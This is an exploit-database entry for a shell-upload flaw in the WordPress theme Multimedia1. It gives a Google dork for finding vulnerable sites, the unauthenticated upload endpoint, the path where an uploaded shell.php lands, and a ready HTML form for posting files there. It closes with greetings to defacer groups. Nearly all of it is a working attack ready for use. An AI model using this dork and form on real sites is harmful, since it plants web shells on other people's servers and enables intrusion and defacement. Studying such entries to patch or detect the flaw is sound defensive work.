id: 27440
date: 03/27/2017
title: Wordpress Multimedia1 Themes CSRF Vulnerability
author: Berandal
cves: 

#################################################################################
# Wordpress Themes Multimedia1 Shell Upload Vulnerability | CSRF
# Author : Berandal
# Google Dork: inurl:/wp-content/themes/multimedia1/
# Tested on: Win 7, Linux
# Blog : http://www.maxteroit.com/
#################################################################################

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

# [!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

# [!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php

#################################################################################
#[*] CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
#################################################################################
# [*] ABOUT:
#################################################################################
# Facebook: https://www.facebook.com/owlsquad.id
# Twitter: https://www.twitter.com/id_berandal
# Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.
#################################################################################

#  0day.today [2023-03-26]  #